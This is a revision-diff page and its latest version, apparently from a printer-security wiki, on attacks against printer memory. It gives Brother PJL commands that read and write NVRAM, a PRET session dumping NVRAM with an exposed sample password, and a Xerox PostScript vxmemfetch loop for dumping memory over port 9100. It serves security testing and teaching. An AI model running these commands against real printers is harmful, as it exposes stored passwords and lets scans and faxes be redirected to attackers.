Difference between revisions of "Memory access"
(3 intermediate revisions by one other user not shown) | |||
Line 5: | Line 5: | ||
For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. | For PJL, a vendor-specific command documented in the Brother laser printer product specifications <ref>''[http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf Brother Laser Printer Technical Reference Guide, Ver. H]'', Brother Industries Ltd., 2004</ref> and discussed by <ref>''[http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf Hacking printers: for fun and profit]'', A. Costin, Hack.lu, 2010</ref> allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where <code>X</code> is an integer, which can be incremented to dump the whole NVRAM. | ||
− | + | <syntaxhighlight lang=sh> | |
− | + | @PJL RNVRAM ADDRESS = X # read byte at location X | |
+ | @PJL WNVRAM ADDRESS = X DATA = Y # write byte Y to location X | ||
+ | </syntaxhighlight> | ||
This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. | This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead. | ||
Line 12: | Line 14: | ||
'''How to test for this attack?''' | '''How to test for this attack?''' | ||
− | The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]] can be tested as follows: | + | The feasibility of this attack, which has been implemented as the ''nvram'' command in [[PRET]], can be tested as follows: |
./pret.py -q printer pjl | ./pret.py -q printer pjl | ||
Line 20: | Line 22: | ||
printer:/> nvram dump | printer:/> nvram dump | ||
Writing copy to nvram/printer | Writing copy to nvram/printer | ||
− | |||
................................................................................ | ................................................................................ | ||
................................................................................ | ................................................................................ | ||
Line 50: | Line 51: | ||
Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. | Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. | ||
− | |||
---- | ---- |
Latest revision as of 11:34, 31 January 2017
If an attacker gains access to the printer's memory or NVRAM, she may be able to obtain sensitive data like passwords or printed documents. Write access to the memory might even lead to code execution.
PJL (Brother)
For PJL, a vendor-specific command documented in the Brother laser printer product specifications [1] and discussed by [2] allows to ‘write data to or retrieve data from the specified address of the printer's NVRAM’. This functionality can be abused to access arbitrary NVRAM addresses using PJL as shown below, where X
is an integer, which can be incremented to dump the whole NVRAM.
@PJL RNVRAM ADDRESS = X # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y # write byte Y to location X
This leads to disclosure of embedded web server passwords stored in the printer's NVRAM. Furthermore – if set – user PINs, passwords for POP3/SMTP as well as for FTP and Active Directory profiles can be obtained. For MFPs, the attacker can change the Scan-to-FTP settings so scanned documents are delivered to an attacker-controlled FTP server or she can exchange fax numbers in the address book whereby fax is sent to the attacker's fax number instead.
How to test for this attack?
The feasibility of this attack, which has been implemented as the nvram command in PRET, can be tested as follows:
./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> nvram dump Writing copy to nvram/printer ................................................................................ ................................................................................ ............................................MyS3cretPassw0rd.................... ................................................................................
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
PostScript (Xerox)
Certain Xerox printer models have a proprietary PostScript vxmemfetch operator built into, which allows an attacker to read arbitrary memory addresses. Using a PostScript loop, this feature can be easily used to dump the whole memory [3] as show below:
/counter 0 def 50000 {
/counter counter 1 add def
currentdict /RRCustomProcs /ProcSet findresource begin
begin counter 1 false vxmemfetch end end == counter
} repeat
How to test for this attack?
Open a raw network connection (using netcat [4], for example) to port 9100/tcp of the printer and send the PostScript code documented above.
Who can perform this attack?
Anyone who can print, for example through USB drive or cable, Port 9100 printing or Cross-site printing.
- ↑ Brother Laser Printer Technical Reference Guide, Ver. H, Brother Industries Ltd., 2004
- ↑ Hacking printers: for fun and profit, A. Costin, Hack.lu, 2010
- ↑ PostScript: Danger Ahead?!, A. Costin, Hack in Paris, 2012
- ↑ Netcat – TCP/IP Swiss Army Knife, Hobbit, 1996